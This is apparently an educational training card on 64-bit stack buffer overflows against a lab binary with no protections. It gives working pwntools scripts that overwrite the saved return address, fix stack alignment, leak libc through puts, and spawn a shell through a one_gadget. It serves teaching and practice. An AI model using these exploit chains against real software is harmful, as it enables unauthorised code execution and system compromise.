Simple Buffer Overflow Without Protections: Return Address Overwrite and Program Flow Redirection

reverse_engineering Difficulty 1–5 30 min certifiable

Theory

Why This Matters

The 64-bit stack buffer overflow is the starting point for the entire ROP/ret2libc exploit class. Even experienced analysts sometimes miscalculate the RIP offset or forget the 16-byte alignment requirement, causing reliable-looking exploits to fail in unexpected ways. NICE K0168 and S0131 require a methodical approach: use cyclic patterns to find the offset precisely, understand the 64-bit stack frame layout, and apply the ret sled alignment trick before calling any libc function that uses SSE instructions. This card consolidates the correct workflow for 64-bit stack overflows without protections.

Core Concept

The x86-64 stack frame at function entry (after push rbp; mov rbp, rsp):

Higher addresses (caller's frame)
  [rbp + 0x08]  saved RIP      <- overwrite target (8 bytes)
  [rbp + 0x00]  saved RBP      <- 8 bytes, corrupted by overflow
  [rbp - 0x08]  local vars...
  [rsp]         (end of frame)
Lower addresses

A buffer at [rbp - N] requires exactly N bytes to fill it, plus 8 bytes for saved RBP, before reaching saved RIP. The total offset from the buffer start to saved RIP is N + 8.
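The N + 8 arithmetic can be checked with a small model of the frame. This is only a sketch: the frame is modelled as a byte array, `simulate_overflow` is a hypothetical helper, and the addresses are made-up illustrative values rather than anything taken from a real binary.

```python
import struct

def simulate_overflow(buf_size: int, payload: bytes):
    """Model the frame as [buffer (N bytes)][saved RBP (8)][saved RIP (8)]."""
    frame = bytearray(buf_size)
    frame += struct.pack("<Q", 0x7FFD00001000)   # hypothetical saved RBP
    frame += struct.pack("<Q", 0x401234)         # hypothetical saved RIP
    # An unbounded copy starts at the buffer and runs upward in memory;
    # it is clipped here to the memory that is modelled.
    n = min(len(payload), len(frame))
    frame[:n] = payload[:n]
    saved_rbp, saved_rip = struct.unpack_from("<QQ", frame, buf_size)
    return saved_rbp, saved_rip

N = 64                                   # buffer at [rbp - 0x40]
offset_to_rip = N + 8                    # buffer bytes plus the saved RBP slot
payload = b"A" * offset_to_rip + struct.pack("<Q", 0x401196)  # hypothetical target

rbp, rip = simulate_overflow(N, payload)
print(f"offset to saved RIP: {offset_to_rip}")
print(f"saved RBP after overflow: {rbp:#x}")
print(f"saved RIP after overflow: {rip:#x}")
```

With N = 64 the model gives the offset of 72 used in the examples on this card; the saved RBP slot ends up filled with padding bytes, which is why RBP is corrupted whenever saved RIP is reached.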

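Finding the offset with cyclic: pwntools generates a De Bruijn sequence in which every 4-byte substring is unique (every 8-byte substring with n=8). Send cyclic(200) and trigger the crash. On x86-64 the pattern bytes form a non-canonical address, so the CPU faults on the ret instruction itself and RIP never holds the pattern. Read the 8-byte value at the top of the stack ([rsp]) at the crash, or from the coredump, and pass its low 4 bytes to cyclic_find() to get the byte offset.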
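To show why a unique-substring pattern pins down the offset, here is a minimal standard-library sketch of the idea. It is not pwntools' implementation: `de_bruijn` is a hypothetical helper using the textbook Lyndon-word construction, and the 4-letter alphabet and the offset of 72 are assumptions chosen to keep the example small.

```python
def de_bruijn(alphabet: bytes, n: int) -> bytes:
    """De Bruijn sequence in which every n-byte window occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)
    indices = []

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                indices.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in indices)

pattern = de_bruijn(b"abcd", 4)[:200]

# Pretend the 8 bytes at offset 72 were read from [rsp] at the crash.
crash_qword = int.from_bytes(pattern[72:80], "little")

# Keep the low 4 bytes, turn them back into little-endian bytes, and search.
low4 = (crash_qword & 0xFFFFFFFF).to_bytes(4, "little")
offset = pattern.find(low4)
print(f"offset to saved RIP: {offset}")   # prints 72
```

Because each 4-byte window appears only once, the search has exactly one possible answer, which is what makes the lookup reliable.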

16-byte alignment requirement: the x86-64 System V ABI requires RSP to be 16-byte aligned immediately before a call instruction. call then pushes the 8-byte return address, so at function entry RSP ends in 0x8 (RSP mod 16 = 8), and the standard push rbp brings it back to a 16-byte boundary inside the callee. A function reached through a ROP chain's ret must see the same state: after that ret pops the function's address, RSP must end in 0x8, otherwise libc code that uses movaps (aligned SSE moves) on stack data will fault. Whether this holds depends on how many 8-byte slots precede the function's address in the chain. The usual fix when it does not hold: insert one bare ret gadget before the function's address, which shifts RSP by 8.
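The alignment bookkeeping can be modelled with modular arithmetic. The sketch below assumes an ABI-compliant caller, so the saved RIP slot of the vulnerable function sits at an address that is 8 mod 16; the helper names and the slot numbering (slot 0 = saved RIP slot) are illustrative choices, not part of any tool.

```python
SAVED_RIP_SLOT_MOD16 = 8   # assumption: caller kept RSP 16-byte aligned at its call

def rsp_mod16_at_entry(slot_index: int) -> int:
    """RSP mod 16 right after the ret that pops the address stored in slot_index."""
    slot_address_mod16 = (SAVED_RIP_SLOT_MOD16 + 8 * slot_index) % 16
    return (slot_address_mod16 + 8) % 16   # ret pops 8 bytes

def needs_extra_ret(slot_index: int) -> bool:
    """A real call leaves RSP mod 16 == 8 at function entry; anything else is misaligned."""
    return rsp_mod16_at_entry(slot_index) != 8

chains = [
    ("win", 0),
    ("ret, win", 1),
    ("pop rdi, arg, system", 2),
    ("ret, pop rdi, arg, system", 3),
]
for description, slot in chains:
    state = "misaligned, add one ret" if needs_extra_ret(slot) else "aligned"
    print(f"{description:28s} function in slot {slot}: {state}")
```

Under these assumptions the result depends only on the position of the function's address within the chain, not on the buffer offset. Treat it as a prediction to confirm in GDB rather than a guarantee.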

Technical Deep-Dive

Step 1 — Find RIP offset with cyclic:

from pwn import *

context.arch = 'amd64'

# Generate cyclic pattern
pattern = cyclic(200)
print(f"Pattern (first 20): {pattern[:20]}")

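# Send to binary; it will crash on ret with the pattern at the top of the stack
p = process('./simple_bof')
p.sendline(pattern)
p.wait()

# Method A: use coredump (core dumps must be enabled, e.g. ulimit -c unlimited)
core = Coredump('./core')
# The ret faults on the non-canonical pattern address, so RIP still points at
# the ret instruction; the value it tried to return to is at [rsp].
ret_val = u64(core.read(core.rsp, 8))
print(f"Return address at crash: {ret_val:#x}")
offset = cyclic_find(ret_val & 0xffffffff)   # cyclic works on 4-byte substrings by default
print(f"Offset to saved RIP: {offset}")

# Method B: use GDB
# (gdb) run < <(python3 -c "from pwn import *; sys.stdout.buffer.write(cyclic(200))")
# (gdb) x/gx $rsp
# Then: cyclic_find(value & 0xffffffff)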

Step 2 — Verify offset and build payload:

from pwn import *

elf = ELF('./simple_bof')
p   = process('./simple_bof')

offset     = 72          # from cyclic analysis
win_addr   = elf.sym['win']
ret_gadget = 0x40101a    # bare ret for alignment (example address; locate it in your binary)

log.info(f'win() @ {win_addr:#x}')

# Returning straight into win() from the saved RIP slot leaves RSP % 16 == 0
# at win() entry, not the RSP % 16 == 8 that a real call would produce.
# If win() calls system(), printf(), or other libc code that uses movaps on
# the stack, that misalignment can crash it.
# One bare ret before win_addr shifts RSP by 8 and restores the expected alignment.

payload  = b'A' * offset
payload += p64(ret_gadget)   # alignment
payload += p64(win_addr)     # jump to win()

p.sendline(payload)
p.interactive()

Step 3 — Determine whether alignment is needed:

# Rule of thumb: in an ABI-compliant frame the saved RIP slot sits at an address
# ending in 0x8, whatever the buffer offset is.
# Number the 8-byte chain slots from 0 (slot 0 = saved RIP slot):
#   function address in an even slot (0, 2, ...): RSP % 16 == 0 at entry -> misaligned, add one ret
#   function address in an odd slot (1, 3, ...):  RSP % 16 == 8 at entry -> aligned, as after a real call
# Example: pop_rdi, arg, system puts system in slot 2 -> one extra ret is needed.
# This arithmetic is subtle -- always verify in GDB with "p $rsp & 0xf"

# Empirical check in GDB:
# (gdb) start < exploit_input     # stop in main so libc is loaded
# (gdb) break *system             # exact entry, before the prologue runs
# (gdb) continue
# (gdb) p $rsp & 0xf
# Should be 0x8 at the first instruction. If 0x0: add one p64(ret_gadget) to the chain.

Complete 64-bit overflow exploit with full ASLR bypass (linking to other techniques):

from pwn import *

elf  = ELF('./simple_bof')
libc = ELF('./libc.so.6')
p    = process('./simple_bof')

offset     = 72
pop_rdi    = 0x401263
ret_gadget = 0x40101a

# Stage 1: leak libc (ret2libc.v2 technique)
payload1  = b'A' * offset
payload1 += p64(pop_rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(elf.sym['main'])
p.sendline(payload1)
leak = u64(p.recvuntil(b'\n', drop=True).ljust(8, b'\x00'))
libc.address = leak - libc.sym['puts']
log.info(f'libc base: {libc.address:#x}')

# Stage 2: shell (ret2libc.v2 / one_gadget)
og = libc.address + 0x4f432    # one_gadget with [rsp+0x40]==NULL constraint (example)
payload2  = b'A' * offset
payload2 += p64(ret_gadget)   # alignment
payload2 += p64(og)
p.sendline(payload2)
p.interactive()

Reverse Engineering Methodology

Use cyclic(200) → crash → cyclic_find(value at [rsp]) as the first step every time. Do not guess the offset from the buffer declaration without empirical verification; struct padding and compiler decisions affect the actual layout.
Confirm the offset one more time: send b'A' * (offset - 8) + b'B' * 8 + b'C' * 8 and verify in GDB that RBP = 0x4242424242424242 (BBBBBBBB) and that the faulting ret is about to pop 0x4343434343434343 (CCCCCCCC). x/gx $rsp shows the C's, while RIP itself still points at the ret because that address is non-canonical.
Determine alignment: in GDB, break at the first instruction of the target function (break *func) and check $rsp & 0xf. A value of 8 matches what a real call produces (16-byte aligned before the call, minus the 8-byte return address). A function reached via ret instead of call gets whatever alignment the chain leaves, so a value of 0 means one extra ret is needed.
Search for the bare ret gadget: ROPgadget --binary ./binary --only "ret" | grep ": ret$". It is almost always present at a low address, for example at the end of _init or in any function epilogue.
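For intuition about what the gadget search finds in the bare ret case: a near ret on x86-64 is the single opcode byte 0xc3, so any 0xc3 byte in executable memory can serve as the gadget. The sketch below scans a made-up byte string; `find_ret_offsets`, the code bytes, and the base address are hypothetical, and a real tool additionally restricts the scan to executable segments.

```python
RET_OPCODE = 0xC3   # near return on x86-64

def find_ret_offsets(code: bytes, base: int) -> list:
    """Return the virtual addresses of every 0xc3 byte in a code blob."""
    return [base + i for i, byte in enumerate(code) if byte == RET_OPCODE]

# Hypothetical code bytes: push rbp; mov rbp, rsp; pop rbp; ret; nop; ret
code = bytes.fromhex("55 48 89 e5 5d c3 90 c3")
base = 0x401000     # hypothetical load address of this blob

for addr in find_ret_offsets(code, base):
    print(f"ret gadget candidate at {addr:#x}")
```

Any one of the reported addresses is enough, since the gadget only needs to pop 8 bytes and continue down the chain.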

Common Reversing Errors

cyclic_find returning wrong offset on 64-bit: by default cyclic_find searches for a 4-byte substring. On 64-bit, the overwritten return address holds 8 bytes of the cyclic pattern. Use cyclic_find(value & 0xffffffff) to search for the lower 4 bytes, or generate the pattern with cyclic(200, n=8) and look it up with cyclic_find(value, n=8).
Forgetting saved RBP in the offset: the layout is [buffer][saved_RBP][saved_RIP]. Cyclic fills buffer AND saved_RBP. The offset to RIP includes the saved RBP slot (8 bytes). cyclic_find gives the offset to the start of the saved RIP slot, not the buffer end.
One-off alignment: inserting one extra ret either fixes or breaks alignment, because it shifts RSP by 8. Inserting two shifts RSP by 16 and has no net effect on alignment. If unsure, try with and without one extra ret and observe in GDB.
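Payload delivery truncated: gets() stops reading at a newline (\x0a), so a payload containing that byte is cut short; fgets(buf, N, stdin) reads at most N-1 bytes and also stops at a newline. If the payload is longer than the read limit, the extra bytes are not delivered. Verify the total payload length against the read limit and check the payload for newline bytes.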
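The delivery check from the last item can be automated before sending anything. This is a minimal sketch with a hypothetical helper, `check_payload`; the addresses and the 64-byte fgets size are illustrative assumptions.

```python
import struct

def check_payload(payload: bytes, read_limit=None, bad_bytes: bytes = b"\n"):
    """Return a list of delivery problems; an empty list means none were found."""
    problems = []
    for index, byte in enumerate(payload):
        if byte in bad_bytes:
            problems.append(
                f"byte {byte:#04x} at payload offset {index} ends the read early"
            )
            break   # everything after the first terminator is lost anyway
    if read_limit is not None and len(payload) > read_limit:
        problems.append(
            f"payload is {len(payload)} bytes but only {read_limit} are read"
        )
    return problems

offset = 72
good = b"A" * offset + struct.pack("<Q", 0x401196)   # hypothetical target address
bad = b"A" * offset + struct.pack("<Q", 0x40100A)    # low byte 0x0a is a newline

print(check_payload(good))                      # no problems for a gets()-style read
print(check_payload(bad))                       # newline inside the packed address
print(check_payload(good, read_limit=64 - 1))   # fgets(buf, 64, stdin) reads 63 bytes
```

When an address contains a terminator byte, a different gadget or target address at a nearby location is usually the simplest way out.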

Challenge Lab

Reinforce your learning with a hands-on generated challenge based on this card's competency.